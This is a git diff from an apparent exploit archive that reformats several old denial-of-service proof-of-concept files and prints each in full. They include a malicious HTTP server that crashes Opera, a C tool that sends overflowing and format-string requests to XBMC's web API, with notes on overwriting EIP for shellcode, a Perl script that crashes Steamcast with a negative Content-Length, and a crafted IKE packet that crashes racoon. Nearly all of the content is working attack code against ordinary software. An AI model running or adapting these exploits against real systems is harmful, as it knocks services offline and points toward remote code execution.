milw0rm.com [2009-03-30] diff --git a/platforms/multiple/dos/8320.py b/platforms/multiple/dos/8320.py index a84f2225a..b008aa5dd 100755 --- a/platforms/multiple/dos/8320.py +++ b/platforms/multiple/dos/8320.py @@ -1,65 +1,64 @@ - -# -# Author : Ahmed Obied (ahmed.obied@gmail.com) -# -# - Similar to the bug found by Wojciech Pawlikowski for Firefox -# -> http://www.milw0rm.com/exploits/8306 -# -# - Tested using the latest version of Opera (9.64) -# -# Usage : python opera.py [port] -# - -import sys, socket -from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler - -class RequestHandler(BaseHTTPRequestHandler): - - def get_exploit(self): - exploit = '' * 7400 - exploit = '' + exploit + '' - return exploit - - def log_request(self, *args, **kwargs): - pass - - def do_GET(self): - if self.path == '/': - print - print '[-] Incoming connection from %s' % self.client_address[0] - print '[-] Sending header to %s ...' % self.client_address[0] - self.send_response(200) - self.send_header('Content-type', 'text/xml') - self.end_headers() - print '[-] Header sent to %s' % self.client_address[0] - print '[-] Sending exploit to %s ...' % self.client_address[0] - self.wfile.write(self.get_exploit()) - print '[-] Exploit sent to %s' % self.client_address[0] - -def main(): - if len(sys.argv) != 2: - print 'Usage: %s [port]' % sys.argv[0] - sys.exit(1) - try: - port = int(sys.argv[1]) - if port < 1 or port > 65535: - raise ValueError - try: - serv = HTTPServer(('', port), RequestHandler) - ip = socket.gethostbyname(socket.gethostname()) - print '[-] Web server is running at http://%s:%d/' % (ip, port) - try: - serv.serve_forever() - except KeyboardInterrupt: - print '[-] Exiting ...' - except socket.error: - print '[*] ERROR: a socket error has occurred ...' - sys.exit(-1) - except ValueError: - print '[*] ERROR: invalid port number ...' - sys.exit(-1) - -if __name__ == '__main__': - main() - -# milw0rm.com [2009-03-30] +# +# Author : Ahmed Obied (ahmed.obied@gmail.com) +# +# - Similar to the bug found by Wojciech Pawlikowski for Firefox +# -> http://www.milw0rm.com/exploits/8306 +# +# - Tested using the latest version of Opera (9.64) +# +# Usage : python opera.py [port] +# + +import sys, socket +from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler + +class RequestHandler(BaseHTTPRequestHandler): + + def get_exploit(self): + exploit = '' * 7400 + exploit = '' + exploit + '' + return exploit + + def log_request(self, *args, **kwargs): + pass + + def do_GET(self): + if self.path == '/': + print + print '[-] Incoming connection from %s' % self.client_address[0] + print '[-] Sending header to %s ...' % self.client_address[0] + self.send_response(200) + self.send_header('Content-type', 'text/xml') + self.end_headers() + print '[-] Header sent to %s' % self.client_address[0] + print '[-] Sending exploit to %s ...' % self.client_address[0] + self.wfile.write(self.get_exploit()) + print '[-] Exploit sent to %s' % self.client_address[0] + +def main(): + if len(sys.argv) != 2: + print 'Usage: %s [port]' % sys.argv[0] + sys.exit(1) + try: + port = int(sys.argv[1]) + if port < 1 or port > 65535: + raise ValueError + try: + serv = HTTPServer(('', port), RequestHandler) + ip = socket.gethostbyname(socket.gethostname()) + print '[-] Web server is running at http://%s:%d/' % (ip, port) + try: + serv.serve_forever() + except KeyboardInterrupt: + print '[-] Exiting ...' + except socket.error: + print '[*] ERROR: a socket error has occurred ...' + sys.exit(-1) + except ValueError: + print '[*] ERROR: invalid port number ...' + sys.exit(-1) + +if __name__ == '__main__': + main() + +# milw0rm.com [2009-03-30] diff --git a/platforms/multiple/dos/8337.c b/platforms/multiple/dos/8337.c index 430e53eca..39c55b029 100755 --- a/platforms/multiple/dos/8337.c +++ b/platforms/multiple/dos/8337.c @@ -1,379 +1,379 @@ -/* -XBMC multiple remote buffer overflow vulnerabilities. - -XBMC is an award winning media center application for -Linux, Mac OS X, Windows and XBox. The ultimate hub -for all your media, XBMC is easy to use, looks slick, -and has a large helpful community.XBMC has won many -awards. - -Affected version: XBMC 8.10 Atlantis -Tested on: Windows xpsp3 and linux unbuntu 8.10 -Venders web site : http://xbmc.org/ -Release date:April the 1st 2009 - -Credits go to n00b for finding the buffer overflow -and writing simple yet effective poc code. -Shout's to every one that knows me and have helped over -the years. - -Please if u do wish to write a exploit for the buffer -overflow please give credits. -also you will have to filter the bad chars from -shellcode if you do wish to write exploit for the -voulnrabilitys in this advisory. - ----------- -Disclaimer ----------- -The information in this advisory and any of its -demonstrations is provided "as is" without any -warranty of any kind. - -I am not liable for any direct or indirect damages -caused as a result of using the information or -demonstrations provided in any part of this advisory. -Educational use only..!! - -You can call by my blog to leave comments and feed back -and ask any questions you would like.Should be up -and runing in a few days. - -[--] -http://n00b-n00b.blogspot.com/ -[--] - -This poc code was writen on linux using gcc-4.* to compile. -*/ - -#include -#include -#include -#include -#include -#include -#include - -/*Just enough recived buffer to allow for the server banner!!*/ - -#define BUFFSIZE 32 - - -void error(char *mess) -{ - perror(mess); - exit(1); -} - -int main(int argc, char *argv[]) -{ - int sock; - int input; - struct sockaddr_in http_client; - char buffer[BUFFSIZE]; - - /*You may need to add more buffer on linux versions!! - on windows its <1010> bytes to own eip next 4 bytes - are loaded into the $esp register.*/ - char buffer1[1500]; - - unsigned int http_len; - int received = 0; - - /* If there is more than 2 arguments passed print usage!!*/ - if (argc != 3) - { - fprintf(stderr,"USAGE: Server_ip port\n"); - exit(1); - } - - /* Create socket */ - if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) - { - error("Cant create socket"); - } - - - /* Construct sockaddr */ - memset(&http_client, 0, sizeof(http_client)); - http_client.sin_family = AF_INET; - http_client.sin_addr.s_addr = inet_addr(argv[1]); - http_client.sin_port = htons(atoi(argv[2])); - - /* Establish connection */ - if (connect(sock, - (struct sockaddr *) &http_client, - sizeof(http_client)) < 0) - { - error("Failed to connect with remote host"); - } - - /*We need to Construct all the voulnrable request togeather*/ - memset( buffer1, 0x41, sizeof(buffer1) - 1 ); - - printf( "----------------------------------------------------------------\n" ); - printf( "XBMC remote buffer overflow poc code by n00b !!\n" ); - printf( "----------------------------------------------------------------\n" ); - printf( "[1]. Get request buffer overflow poc !!\n" ); - printf( "[2]. Get /xbmcHttp?command=takescreenshot buffer overflow !!\n" ); - printf( "[3]. Get /xbmcHttp?command=GetTagFromFilename buffer overflow !!\n" ); - printf( "[4]. queryvideodatabase possible format string poc !!\n" ); - printf( "----------------------------------------------------------------\n" ); - printf( "----------------------------------------------------------------\n" ); - printf( "[5]. Cancel and quit application !!\n" ); - printf( "----------------------\n" ); - printf( "Pick your http request: " ); - scanf( "%d", &input ); - switch ( input ) - { - case 1: - memcpy ( buffer1, "GET /", 5); - memcpy ( buffer1 +(sizeof(buffer1) - 1) - 21, ".asp HTTP/1.1\r\n\r\n", 21); - break; - case 2: - memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=takescreenshot(", 46); - memcpy ( buffer1 +(sizeof(buffer1) - 1) - 41, ".jpg;false;0;300;200;90) HTTP/1.1\r\n\r\n", 41); - break; - case 3: - memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=GetTagFromFilename(C:/", 53); - memcpy ( buffer1 +(sizeof(buffer1) - 1) - 23, ".mp3) HTTP/1.1\r\n\r\n", 23); - break; - case 4: - memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=queryvideodatabase(%s%s%s%s) HTTP/1.1\r\n\r\n", 76); - break; - case 5: - exit(0); - break; - } - - - /* Send our get request to the server*/ - http_len = strlen(buffer1); - if (send(sock, buffer1, http_len, 0) != http_len) - { - error("No byte's where sent to remote host check Get request !!"); - } - - - /* Receive the current state of the server*/ - fprintf(stdout, "Received: "); - while (received < http_len) - { - int bytes = 0; - if ((bytes = recv(sock, buffer, BUFFSIZE-1, 0)) < 1) - { - error("Was the banner received?? if no banner exploit was successfull!!"); - } - received += bytes; - buffer[bytes] = '\0'; - fprintf(stdout, buffer); - } - - fprintf(stdout, "\n"); - close(sock); - exit(0); -} - - -/* -A basic run down of the bugs found with a basic discription.!! - - -(1)..(Get request WebsHomePageHandler buffer overflow).. - -I was able to track down most of the vulnerable code.All this info -was collected on a window's system. - -The first buffer overflow i found in the xbmc application all is -required was for me to make a simple get request by adding 1033 bytes -of user supplied data to the request.We are now able to gain control of the -$eip register and the next four bytes on the stack is where our $esp register -is pointing. - - ---snip-- - - -Source of WebsHomePageHandler..\XBMC\xbmc\lib\libGoAhead\WebServer.cpp - - - - - Home page handler - -static int websHomePageHandler(webs_t wp, char_t *urlPrefix, char_t *webDir, -int arg, char_t *url, char_t *path, char_t *query) -{ - - If the empty or "/" URL is invoked, redirect default URLs to the home page - - char dir[1024]; - char files[][20] = { - {"index.html"}, - {"index.htm"}, - {"home.htm"}, - {"home.html"}, - {"default.asp"}, - {"home.asp"}, - {'\0' } - }; - - - - - strcpy(dir, websGetDefaultDir()); - strcat(dir, path); - for(u_int pos = 0; pos < strlen(dir); pos++) -if (dir[pos] == '/') dir[pos] = '\\'; - -DWORD attributes = GetFileAttributes(dir); -if (FILE_ATTRIBUTE_DIRECTORY == attributes) -{ -int i = 0; -char buf[1024]; -while (files[i][0]) -{ -strcpy(buf, dir); -if (buf[strlen(buf)-1] != '\\') strcat(buf, "\\"); -strcat(buf, files[i]); - -if (!access(buf, 0)) -{ -strcpy(buf, path); -if (path[strlen(path)-1] != '/') strcat(buf, "/"); -strcat(buf, files[i]); -websRedirect(wp, buf); -return 1; -} -i++; -} - - ---snip-- - - -the next set of voulnrabilitys are exploited through -the "Web Server HTTP API". -more information can be read at the following link. -I wrote a simple fuzzer and fuzzed all the commands that -where passed through the http requests. - - -http://xbmc.org/wiki/?title=WebServerHTTP-API - - -(2)..(takescreenshot remote buffer overflow).. - -please visit the above link for more information -on specific command's.This is also a classic buffer -overflow where we can add a long file name to the -takescreenshot command and pass it to the API. -once again we can over flow the static allocated -buffer on the stack and let us own the application -flow.Thus letting us execute our own supplied data. -Also as a side note to this buffer overflow -there are different registers over wrote. - -...\XBMC\xbmc\cores\DllLoader\exports\emu_msvcrt.cpp - ---snip-- - - -int dll_open(const char* szFileName, int iMode) - { - char str[XBMC_MAX_PATH]; - - // move to CFile classes - if (strncmp(szFileName, "\\Device\\Cdrom0", 14) == 0) - { - // replace "\\Device\\Cdrom0" with "D:" - strcpy(str, "D:"); - strcat(str, szFileName + 14); - } - else strcpy(str, szFileName); - - CFile* pFile = new CFile(); - bool bBinary = false; - if (iMode & O_BINARY) - bBinary = true; - bool bWrite = false; - if ((iMode & O_RDWR) || (iMode & O_WRONLY)) - bWrite = true; - bool bOverwrite=false; - if ((iMode & _O_TRUNC) || (iMode & O_CREAT)) - bOverwrite = true; - // currently always overwrites - bool bResult; - if (bWrite) - bResult = pFile->OpenForWrite(_P(str), bBinary, bOverwrite); - else - bResult = pFile->Open(_P(str), bBinary); - if (bResult) - { - EmuFileObject* object = g_emuFileWrapper.RegisterFileObject(pFile); - if (object == NULL) - { - VERIFY(0); - pFile->Close(); - delete pFile; - return -1; - } - return g_emuFileWrapper.GetDescriptorByStream(&object->file_emu); - } - delete pFile; - return -1; - } - ---snip-- - -We also know that szFileName is defind in a headerfile with -1024 bytes staticaly allocated.So if we passs more the 1024 byte's we can cause -stack corruption and over write the $eip also give's us a choice of registers -we can use for our shell code. - - - -(3)..(GetTagFromFilename remote buffer overflow).. - -The buffer over flow is when parsing a id3 tag -the difference is the registers that are over wrote -at the time of access violation are as follow's.Im not -going to list all the source for all the exceptions. -This poc is big enough already with out adding more -information and its simple to set up XBMC and compile -on your own machine.. - - - -(4)..(Sqlite queryvideodatabase).. - -Just results in denial of service no more information available -maybe ill look more into sqllite3 in the future. - -[--] -/xbmcCmds/xbmcHttp?command=queryvideodatabase(%s%s%s%s) -[--] - -All the above vulnerability's where tested on linux and windows -On linux unbuntu 8.10 using strace to debug.And on windows -i used visual c++ express 2008.This poc code is just a simple -poc code to show the vulnerability's i found within the XBMC -application. - -it started off as closed source analysis.Although -the application was tested there are still a lot of other -possibility for exploitation.Even the login for the web server -could be vulnerable to a buffer overflow. - -Also worth a mention is i could take controll over the XBMC -web server and there would be no error messages or any thing to -sugest that the server had been took offline but it carrys on as -normal the rest of xbmc stays the same with out any changes. -It looks like it just terminates the thread and leaving the -rest of the application intact and continues to run -like normal. - - -*/ - -// milw0rm.com [2009-04-01] +/* +XBMC multiple remote buffer overflow vulnerabilities. + +XBMC is an award winning media center application for +Linux, Mac OS X, Windows and XBox. The ultimate hub +for all your media, XBMC is easy to use, looks slick, +and has a large helpful community.XBMC has won many +awards. + +Affected version: XBMC 8.10 Atlantis +Tested on: Windows xpsp3 and linux unbuntu 8.10 +Venders web site : http://xbmc.org/ +Release date:April the 1st 2009 + +Credits go to n00b for finding the buffer overflow +and writing simple yet effective poc code. +Shout's to every one that knows me and have helped over +the years. + +Please if u do wish to write a exploit for the buffer +overflow please give credits. +also you will have to filter the bad chars from +shellcode if you do wish to write exploit for the +voulnrabilitys in this advisory. + +---------- +Disclaimer +---------- +The information in this advisory and any of its +demonstrations is provided "as is" without any +warranty of any kind. + +I am not liable for any direct or indirect damages +caused as a result of using the information or +demonstrations provided in any part of this advisory. +Educational use only..!! + +You can call by my blog to leave comments and feed back +and ask any questions you would like.Should be up +and runing in a few days. + +[--] +http://n00b-n00b.blogspot.com/ +[--] + +This poc code was writen on linux using gcc-4.* to compile. +*/ + +#include +#include +#include +#include +#include +#include +#include + +/*Just enough recived buffer to allow for the server banner!!*/ + +#define BUFFSIZE 32 + + +void error(char *mess) +{ + perror(mess); + exit(1); +} + +int main(int argc, char *argv[]) +{ + int sock; + int input; + struct sockaddr_in http_client; + char buffer[BUFFSIZE]; + + /*You may need to add more buffer on linux versions!! + on windows its <1010> bytes to own eip next 4 bytes + are loaded into the $esp register.*/ + char buffer1[1500]; + + unsigned int http_len; + int received = 0; + + /* If there is more than 2 arguments passed print usage!!*/ + if (argc != 3) + { + fprintf(stderr,"USAGE: Server_ip port\n"); + exit(1); + } + + /* Create socket */ + if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) + { + error("Cant create socket"); + } + + + /* Construct sockaddr */ + memset(&http_client, 0, sizeof(http_client)); + http_client.sin_family = AF_INET; + http_client.sin_addr.s_addr = inet_addr(argv[1]); + http_client.sin_port = htons(atoi(argv[2])); + + /* Establish connection */ + if (connect(sock, + (struct sockaddr *) &http_client, + sizeof(http_client)) < 0) + { + error("Failed to connect with remote host"); + } + + /*We need to Construct all the voulnrable request togeather*/ + memset( buffer1, 0x41, sizeof(buffer1) - 1 ); + + printf( "----------------------------------------------------------------\n" ); + printf( "XBMC remote buffer overflow poc code by n00b !!\n" ); + printf( "----------------------------------------------------------------\n" ); + printf( "[1]. Get request buffer overflow poc !!\n" ); + printf( "[2]. Get /xbmcHttp?command=takescreenshot buffer overflow !!\n" ); + printf( "[3]. Get /xbmcHttp?command=GetTagFromFilename buffer overflow !!\n" ); + printf( "[4]. queryvideodatabase possible format string poc !!\n" ); + printf( "----------------------------------------------------------------\n" ); + printf( "----------------------------------------------------------------\n" ); + printf( "[5]. Cancel and quit application !!\n" ); + printf( "----------------------\n" ); + printf( "Pick your http request: " ); + scanf( "%d", &input ); + switch ( input ) + { + case 1: + memcpy ( buffer1, "GET /", 5); + memcpy ( buffer1 +(sizeof(buffer1) - 1) - 21, ".asp HTTP/1.1\r\n\r\n", 21); + break; + case 2: + memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=takescreenshot(", 46); + memcpy ( buffer1 +(sizeof(buffer1) - 1) - 41, ".jpg;false;0;300;200;90) HTTP/1.1\r\n\r\n", 41); + break; + case 3: + memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=GetTagFromFilename(C:/", 53); + memcpy ( buffer1 +(sizeof(buffer1) - 1) - 23, ".mp3) HTTP/1.1\r\n\r\n", 23); + break; + case 4: + memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=queryvideodatabase(%s%s%s%s) HTTP/1.1\r\n\r\n", 76); + break; + case 5: + exit(0); + break; + } + + + /* Send our get request to the server*/ + http_len = strlen(buffer1); + if (send(sock, buffer1, http_len, 0) != http_len) + { + error("No byte's where sent to remote host check Get request !!"); + } + + + /* Receive the current state of the server*/ + fprintf(stdout, "Received: "); + while (received < http_len) + { + int bytes = 0; + if ((bytes = recv(sock, buffer, BUFFSIZE-1, 0)) < 1) + { + error("Was the banner received?? if no banner exploit was successfull!!"); + } + received += bytes; + buffer[bytes] = '\0'; + fprintf(stdout, buffer); + } + + fprintf(stdout, "\n"); + close(sock); + exit(0); +} + + +/* +A basic run down of the bugs found with a basic discription.!! + + +(1)..(Get request WebsHomePageHandler buffer overflow).. + +I was able to track down most of the vulnerable code.All this info +was collected on a window's system. + +The first buffer overflow i found in the xbmc application all is +required was for me to make a simple get request by adding 1033 bytes +of user supplied data to the request.We are now able to gain control of the +$eip register and the next four bytes on the stack is where our $esp register +is pointing. + + +--snip-- + + +Source of WebsHomePageHandler..\XBMC\xbmc\lib\libGoAhead\WebServer.cpp + + + + + Home page handler + +static int websHomePageHandler(webs_t wp, char_t *urlPrefix, char_t *webDir, +int arg, char_t *url, char_t *path, char_t *query) +{ + + If the empty or "/" URL is invoked, redirect default URLs to the home page + + char dir[1024]; + char files[][20] = { + {"index.html"}, + {"index.htm"}, + {"home.htm"}, + {"home.html"}, + {"default.asp"}, + {"home.asp"}, + {'\0' } + }; + + + + + strcpy(dir, websGetDefaultDir()); + strcat(dir, path); + for(u_int pos = 0; pos < strlen(dir); pos++) +if (dir[pos] == '/') dir[pos] = '\\'; + +DWORD attributes = GetFileAttributes(dir); +if (FILE_ATTRIBUTE_DIRECTORY == attributes) +{ +int i = 0; +char buf[1024]; +while (files[i][0]) +{ +strcpy(buf, dir); +if (buf[strlen(buf)-1] != '\\') strcat(buf, "\\"); +strcat(buf, files[i]); + +if (!access(buf, 0)) +{ +strcpy(buf, path); +if (path[strlen(path)-1] != '/') strcat(buf, "/"); +strcat(buf, files[i]); +websRedirect(wp, buf); +return 1; +} +i++; +} + + +--snip-- + + +the next set of voulnrabilitys are exploited through +the "Web Server HTTP API". +more information can be read at the following link. +I wrote a simple fuzzer and fuzzed all the commands that +where passed through the http requests. + + +http://xbmc.org/wiki/?title=WebServerHTTP-API + + +(2)..(takescreenshot remote buffer overflow).. + +please visit the above link for more information +on specific command's.This is also a classic buffer +overflow where we can add a long file name to the +takescreenshot command and pass it to the API. +once again we can over flow the static allocated +buffer on the stack and let us own the application +flow.Thus letting us execute our own supplied data. +Also as a side note to this buffer overflow +there are different registers over wrote. + +...\XBMC\xbmc\cores\DllLoader\exports\emu_msvcrt.cpp + +--snip-- + + +int dll_open(const char* szFileName, int iMode) + { + char str[XBMC_MAX_PATH]; + + // move to CFile classes + if (strncmp(szFileName, "\\Device\\Cdrom0", 14) == 0) + { + // replace "\\Device\\Cdrom0" with "D:" + strcpy(str, "D:"); + strcat(str, szFileName + 14); + } + else strcpy(str, szFileName); + + CFile* pFile = new CFile(); + bool bBinary = false; + if (iMode & O_BINARY) + bBinary = true; + bool bWrite = false; + if ((iMode & O_RDWR) || (iMode & O_WRONLY)) + bWrite = true; + bool bOverwrite=false; + if ((iMode & _O_TRUNC) || (iMode & O_CREAT)) + bOverwrite = true; + // currently always overwrites + bool bResult; + if (bWrite) + bResult = pFile->OpenForWrite(_P(str), bBinary, bOverwrite); + else + bResult = pFile->Open(_P(str), bBinary); + if (bResult) + { + EmuFileObject* object = g_emuFileWrapper.RegisterFileObject(pFile); + if (object == NULL) + { + VERIFY(0); + pFile->Close(); + delete pFile; + return -1; + } + return g_emuFileWrapper.GetDescriptorByStream(&object->file_emu); + } + delete pFile; + return -1; + } + +--snip-- + +We also know that szFileName is defind in a headerfile with +1024 bytes staticaly allocated.So if we passs more the 1024 byte's we can cause +stack corruption and over write the $eip also give's us a choice of registers +we can use for our shell code. + + + +(3)..(GetTagFromFilename remote buffer overflow).. + +The buffer over flow is when parsing a id3 tag +the difference is the registers that are over wrote +at the time of access violation are as follow's.Im not +going to list all the source for all the exceptions. +This poc is big enough already with out adding more +information and its simple to set up XBMC and compile +on your own machine.. + + + +(4)..(Sqlite queryvideodatabase).. + +Just results in denial of service no more information available +maybe ill look more into sqllite3 in the future. + +[--] +/xbmcCmds/xbmcHttp?command=queryvideodatabase(%s%s%s%s) +[--] + +All the above vulnerability's where tested on linux and windows +On linux unbuntu 8.10 using strace to debug.And on windows +i used visual c++ express 2008.This poc code is just a simple +poc code to show the vulnerability's i found within the XBMC +application. + +it started off as closed source analysis.Although +the application was tested there are still a lot of other +possibility for exploitation.Even the login for the web server +could be vulnerable to a buffer overflow. + +Also worth a mention is i could take controll over the XBMC +web server and there would be no error messages or any thing to +sugest that the server had been took offline but it carrys on as +normal the rest of xbmc stays the same with out any changes. +It looks like it just terminates the thread and leaving the +rest of the application intact and continues to run +like normal. + + +*/ + +// milw0rm.com [2009-04-01] diff --git a/platforms/multiple/dos/838.pl b/platforms/multiple/dos/838.pl index 7e65cc687..9ea746f75 100755 --- a/platforms/multiple/dos/838.pl +++ b/platforms/multiple/dos/838.pl @@ -54,6 +54,6 @@ print $socket2 "GET HTTP/1.0\r\n"; close($socket2); print "Attack finished ;)\n"; -exit(); - -# milw0rm.com [2005-02-24] +exit(); + +# milw0rm.com [2005-02-24] diff --git a/platforms/multiple/dos/8429.pl b/platforms/multiple/dos/8429.pl index d9d43cdfc..7752b679d 100755 --- a/platforms/multiple/dos/8429.pl +++ b/platforms/multiple/dos/8429.pl @@ -1,25 +1,25 @@ -#!/usr/bin/perl -#Steamcast 0.9.75 beta Remote Denial of Service -#Download :http://www.steamcast.com -#Tested Under Windows XP and linux -#Dork for test :"Powered By Steamcast "0.9.75 beta -#Author: ksa04 -use strict; -use warnings; -use IO::Socket; - -my $host = shift || die "usage: perl $0 host port\n"; -my $port = shift ; - -my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto => 'tcp') -or die "error: $!\n"; - -$sock->send("POST / HTTP/1.1\r\n"); -$sock->send("Content-Length: -100\r\n\r\n"); - - -$sock->close; - -print "[+]Done...\n"; - -# milw0rm.com [2009-04-14] +#!/usr/bin/perl +#Steamcast 0.9.75 beta Remote Denial of Service +#Download :http://www.steamcast.com +#Tested Under Windows XP and linux +#Dork for test :"Powered By Steamcast "0.9.75 beta +#Author: ksa04 +use strict; +use warnings; +use IO::Socket; + +my $host = shift || die "usage: perl $0 host port\n"; +my $port = shift ; + +my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto => 'tcp') +or die "error: $!\n"; + +$sock->send("POST / HTTP/1.1\r\n"); +$sock->send("Content-Length: -100\r\n\r\n"); + + +$sock->close; + +print "[+]Done...\n"; + +# milw0rm.com [2009-04-14] diff --git a/platforms/multiple/dos/855.pl b/platforms/multiple/dos/855.pl index 0040ddf1a..ec2ecd63d 100755 --- a/platforms/multiple/dos/855.pl +++ b/platforms/multiple/dos/855.pl @@ -107,6 +107,6 @@ print "> \n"; close($s); -print " <+> Ok now target web server maybe DoSeD.\n"; - -# milw0rm.com [2005-03-04] +print " <+> Ok now target web server maybe DoSeD.\n"; + +# milw0rm.com [2005-03-04] diff --git a/platforms/multiple/dos/8646.php b/platforms/multiple/dos/8646.php index 81ddd322c..0d609cd8c 100755 --- a/platforms/multiple/dos/8646.php +++ b/platforms/multiple/dos/8646.php @@ -1,46 +1,46 @@ - \n\n"); -} - -# milw0rm.com [2009-05-08] + \n\n"); +} + +# milw0rm.com [2009-05-08] diff --git a/platforms/multiple/dos/8669.c b/platforms/multiple/dos/8669.c index 3a0591609..4d0395dab 100755 --- a/platforms/multiple/dos/8669.c +++ b/platforms/multiple/dos/8669.c @@ -1,142 +1,142 @@ -/* racoon-isakmp-dos.c - * - * Copyright (c) 2009 by - * - * ipsec-tools racoon frag-isakmp DoS POC - * by mu-b - Thu Apr 02 2009 - * - * - Tested on: ipsec-tools-0.7.1 - * - * - Private Source Code -DO NOT DISTRIBUTE - - * http://www.digit-labs.org/ -- Digit-Labs 2009!@$! - */ - -#include -#include - -#include -#include -#include -#include -#include - -#define DEF_PORT 500 -#define PORT_ISAKMP DEF_PORT - -#define ISAKMP_VERSION_NUMBER 0x10 -#define ISAKMP_ETYPE_BASE 1 /* Base */ - -/* Frag does not seems to be documented */ -#define ISAKMP_NPTYPE_FRAG 132 /* IKE fragmentation payload */ - -/* flags */ -#define ISAKMP_FRAG_LAST 1 - -typedef u_char cookie_t[8]; - -/* 3.1 ISAKMP Header Format */ -struct isakmp { - cookie_t i_ck; /* Initiator Cookie */ - cookie_t r_ck; /* Responder Cookie */ - unsigned char np; /* Next Payload Type */ - unsigned char v; - unsigned char etype; /* Exchange Type */ - unsigned char flags; /* Flags */ - unsigned int msgid; - unsigned int len; /* Length */ -}; - -/* IKE fragmentation payload */ -struct isakmp_frag { - unsigned short unknown0; /* always set to zero? */ - unsigned short len; - unsigned short unknown1; /* always set to 1? */ - unsigned char index; - unsigned char flags; -}; - -/* used to verify the r_ck. */ -static u_char r_ck0[] = { 0,0,0,0,0,0,0,0 }; - -static void -isa_kmp_dos (char *host) -{ - char buf[sizeof (struct isakmp) + - sizeof (struct isakmp_frag)]; - struct isakmp *hdr; - struct isakmp_frag *frag; - struct sockaddr_in saddr; - struct hostent *hp; - int fd, i, len, n; - - if ((fd = socket (AF_INET, SOCK_DGRAM, 0)) == -1) - { - perror ("socket()"); - exit (EXIT_FAILURE); - } - - if ((hp = gethostbyname (host)) == NULL) - { - perror ("gethostbyname()"); - exit (EXIT_FAILURE); - } - - memset (&saddr, 0, sizeof saddr); - memcpy ((char *) &saddr.sin_addr, hp->h_addr, hp->h_length); - saddr.sin_family = AF_INET; - saddr.sin_port = htons (PORT_ISAKMP); - - /* formulate request */ - memset (buf, 0, sizeof (buf)); - - hdr = (struct isakmp *) buf; - frag = (struct isakmp_frag *) (hdr + 1); - - for (i = 0; i < sizeof (hdr->i_ck); i++) - hdr->i_ck[i] = (rand () % 255) + 1; - - memcpy (&hdr->r_ck, r_ck0, sizeof (hdr->r_ck)); - hdr->v = ISAKMP_VERSION_NUMBER; - hdr->flags = 0; - hdr->etype = ISAKMP_ETYPE_BASE; - hdr->msgid = 0; - hdr->np = ISAKMP_NPTYPE_FRAG; - - len = sizeof (struct isakmp) + sizeof (struct isakmp_frag); - hdr->len = htonl (len); - - frag->len = htons (sizeof (struct isakmp_frag)); - frag->index = 1; - frag->flags = ISAKMP_FRAG_LAST; - - n = sendto (fd, hdr, len, 0, (struct sockaddr *) &saddr, sizeof saddr); - if (n < 0 || n != len) - { - fprintf (stderr, "isa_kmp_dos: sendto %d != %d\n", n, len); - exit (EXIT_FAILURE); - } - - close (fd); -} - -int -main (int argc, char **argv) -{ - printf ("ipsec-tools racoon frag-isakmp DoS PoC\n" - "by: \n" - "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n"); - - if (argc <= 1) - { - fprintf (stderr, "Usage: %s \n", argv[0]); - exit (EXIT_SUCCESS); - } - - printf ("* crashing racoon... "); - isa_kmp_dos (argv[1]); - printf ("done\n\n"); - - return (EXIT_SUCCESS); -} - -// milw0rm.com [2009-05-13] +/* racoon-isakmp-dos.c + * + * Copyright (c) 2009 by + * + * ipsec-tools racoon frag-isakmp DoS POC + * by mu-b - Thu Apr 02 2009 + * + * - Tested on: ipsec-tools-0.7.1 + * + * - Private Source Code -DO NOT DISTRIBUTE - + * http://www.digit-labs.org/ -- Digit-Labs 2009!@$! + */ + +#include +#include + +#include +#include +#include +#include +#include + +#define DEF_PORT 500 +#define PORT_ISAKMP DEF_PORT + +#define ISAKMP_VERSION_NUMBER 0x10 +#define ISAKMP_ETYPE_BASE 1 /* Base */ + +/* Frag does not seems to be documented */ +#define ISAKMP_NPTYPE_FRAG 132 /* IKE fragmentation payload */ + +/* flags */ +#define ISAKMP_FRAG_LAST 1 + +typedef u_char cookie_t[8]; + +/* 3.1 ISAKMP Header Format */ +struct isakmp { + cookie_t i_ck; /* Initiator Cookie */ + cookie_t r_ck; /* Responder Cookie */ + unsigned char np; /* Next Payload Type */ + unsigned char v; + unsigned char etype; /* Exchange Type */ + unsigned char flags; /* Flags */ + unsigned int msgid; + unsigned int len; /* Length */ +}; + +/* IKE fragmentation payload */ +struct isakmp_frag { + unsigned short unknown0; /* always set to zero? */ + unsigned short len; + unsigned short unknown1; /* always set to 1? */ + unsigned char index; + unsigned char flags; +}; + +/* used to verify the r_ck. */ +static u_char r_ck0[] = { 0,0,0,0,0,0,0,0 }; + +static void +isa_kmp_dos (char *host) +{ + char buf[sizeof (struct isakmp) + + sizeof (struct isakmp_frag)]; + struct isakmp *hdr; + struct isakmp_frag *frag; + struct sockaddr_in saddr; + struct hostent *hp; + int fd, i, len, n; + + if ((fd = socket (AF_INET, SOCK_DGRAM, 0)) == -1) + { + perror ("socket()"); + exit (EXIT_FAILURE); + } + + if ((hp = gethostbyname (host)) == NULL) + { + perror ("gethostbyname()"); + exit (EXIT_FAILURE); + } + + memset (&saddr, 0, sizeof saddr); + memcpy ((char *) &saddr.sin_addr, hp->h_addr, hp->h_length); + saddr.sin_family = AF_INET; + saddr.sin_port = htons (PORT_ISAKMP); + + /* formulate request */ + memset (buf, 0, sizeof (buf)); + + hdr = (struct isakmp *) buf; + frag = (struct isakmp_frag *) (hdr + 1); + + for (i = 0; i < sizeof (hdr->i_ck); i++) + hdr->i_ck[i] = (rand () % 255) + 1; + + memcpy (&hdr->r_ck, r_ck0, sizeof (hdr->r_ck)); + hdr->v = ISAKMP_VERSION_NUMBER; + hdr->flags = 0; + hdr->etype = ISAKMP_ETYPE_BASE; + hdr->msgid = 0; + hdr->np = ISAKMP_NPTYPE_FRAG; + + len = sizeof (struct isakmp) + sizeof (struct isakmp_frag); + hdr->len = htonl (len); + + frag->len = htons (sizeof (struct isakmp_frag)); + frag->index = 1; + frag->flags = 